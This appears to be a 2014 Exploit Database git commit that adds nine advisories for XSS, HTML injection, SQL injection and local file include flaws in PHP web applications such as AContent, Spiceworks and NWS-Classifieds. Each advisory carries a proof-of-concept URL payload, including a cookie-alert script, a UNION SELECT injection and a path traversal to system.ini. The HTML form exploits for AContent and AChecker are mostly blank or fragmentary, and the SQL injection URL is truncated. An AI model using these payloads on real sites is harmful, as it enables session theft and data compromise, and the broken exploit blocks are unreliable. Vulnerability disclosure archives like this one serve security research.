From e2eef480e2e44e1de4db125a1bd723f37e9be538 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 14 Sep 2014 04:44:14 +0000 Subject: [PATCH] Updated 09_14_2014 --- files.csv | 9 ++++++ platforms/php/webapps/34628.txt | 9 ++++++ platforms/php/webapps/34629.txt | 53 +++++++++++++++++++++++++++++++++ platforms/php/webapps/34630.txt | 18 +++++++++++ platforms/php/webapps/34631.txt | 11 +++++++ platforms/php/webapps/34632.txt | 9 ++++++ platforms/php/webapps/34633.txt | 9 ++++++ platforms/php/webapps/34634.txt | 9 ++++++ platforms/php/webapps/34635.txt | 7 +++++ platforms/php/webapps/34636.txt | 9 ++++++ 10 files changed, 143 insertions(+) create mode 100755 platforms/php/webapps/34628.txt create mode 100755 platforms/php/webapps/34629.txt create mode 100755 platforms/php/webapps/34630.txt create mode 100755 platforms/php/webapps/34631.txt create mode 100755 platforms/php/webapps/34632.txt create mode 100755 platforms/php/webapps/34633.txt create mode 100755 platforms/php/webapps/34634.txt create mode 100755 platforms/php/webapps/34635.txt create mode 100755 platforms/php/webapps/34636.txt diff --git a/files.csv b/files.csv index 3f1609dd0..5115ad307 100755 --- a/files.csv +++ b/files.csv @@ -31179,3 +31179,12 @@ id,file,description,date,author,platform,type,port 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 +34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 'search' Parameter Cross-Site Scripting Vulnerability",2010-09-06,"High-Tech Bridge SA",php,webapps,0 +34629,platforms/php/webapps/34629.txt,"AContent 1.0 Cross Site Scripting and HTML Injection Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 +34630,platforms/php/webapps/34630.txt,"AChecker 1.0 'uri' Parameter Cross-Site Scripting Vulnerability",2010-09-15,"High-Tech Bridge SA",php,webapps,0 +34631,platforms/php/webapps/34631.txt,"ATutor 1.0 Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 +34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 'search' Parameter HTML Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0 +34633,platforms/php/webapps/34633.txt,"Spiceworks 'query' Parameter Cross Site Scripting Vulnerability",2009-08-08,"Adam Baldwin",php,webapps,0 +34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0 +34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0 +34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0 diff --git a/platforms/php/webapps/34628.txt b/platforms/php/webapps/34628.txt new file mode 100755 index 000000000..ad8c5414e --- /dev/null +++ b/platforms/php/webapps/34628.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43237/info + +Santafox is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Santafox 2.02 is vulnerable; other versions may be affected. + +http://www.example.com/search.html?search=1">&x=0&y=0 \ No newline at end of file diff --git a/platforms/php/webapps/34629.txt b/platforms/php/webapps/34629.txt new file mode 100755 index 000000000..bb53b0101 --- /dev/null +++ b/platforms/php/webapps/34629.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/43238/info + +AContent is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +AContent 1.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/home/search.php?search_text=txt">&catid=&search=Search + + +
+ + + + + + + + + + + + + + + + + + + + + +
+ + + +
+ + + + + + + + + +
+ diff --git a/platforms/php/webapps/34630.txt b/platforms/php/webapps/34630.txt new file mode 100755 index 000000000..bb8b54fa3 --- /dev/null +++ b/platforms/php/webapps/34630.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/43240/info + +AChecker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +AChecker 1.0 is vulnerable; other versions may be affected. + +
+' /> + + + + +
+ diff --git a/platforms/php/webapps/34631.txt b/platforms/php/webapps/34631.txt new file mode 100755 index 000000000..49c11380d --- /dev/null +++ b/platforms/php/webapps/34631.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43241/info + +ATutor is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +ATutor 1.0 is vulnerable, other versions may also be affected. + +http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"> + +http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"> diff --git a/platforms/php/webapps/34632.txt b/platforms/php/webapps/34632.txt new file mode 100755 index 000000000..67cb5a99f --- /dev/null +++ b/platforms/php/webapps/34632.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43245/info + +Multi Website is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Multi Website 1.5 is vulnerable; other versions may also be affected. + +http://www.example.com/demo/?action=search&search=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&gateway=%E4%E3%D8+%C7%E1%C8%CD%CB&by=words \ No newline at end of file diff --git a/platforms/php/webapps/34633.txt b/platforms/php/webapps/34633.txt new file mode 100755 index 000000000..5e2b03e80 --- /dev/null +++ b/platforms/php/webapps/34633.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43248/info + +Spiceworks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Spiceworks 3.6.33156 and 4.1.39229 are vulnerable; other versions may also be affected. + +http://www.example.com/search?query=--%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/34634.txt b/platforms/php/webapps/34634.txt new file mode 100755 index 000000000..b3e215adc --- /dev/null +++ b/platforms/php/webapps/34634.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43249/info + +Multiple I-Escorts products are prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +I-Escorts Directory Script and I-Escorts Agency Script are vulnerable. + +http://www.example.com/demos/escorts-agency/escorts_search.php => Your XSS \ No newline at end of file diff --git a/platforms/php/webapps/34635.txt b/platforms/php/webapps/34635.txt new file mode 100755 index 000000000..d886d0f18 --- /dev/null +++ b/platforms/php/webapps/34635.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/43254/info + +Willscript Auction Website Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/webtrade/category.php?cate_id=-19%20union%20all%20select%201,version%28 \ No newline at end of file diff --git a/platforms/php/webapps/34636.txt b/platforms/php/webapps/34636.txt new file mode 100755 index 000000000..ca402f4b6 --- /dev/null +++ b/platforms/php/webapps/34636.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43259/info + +NWS-Classifieds is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +NWS-Classifieds 007 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?cmd=../../../../../../../../windows/system.ini%00 \ No newline at end of file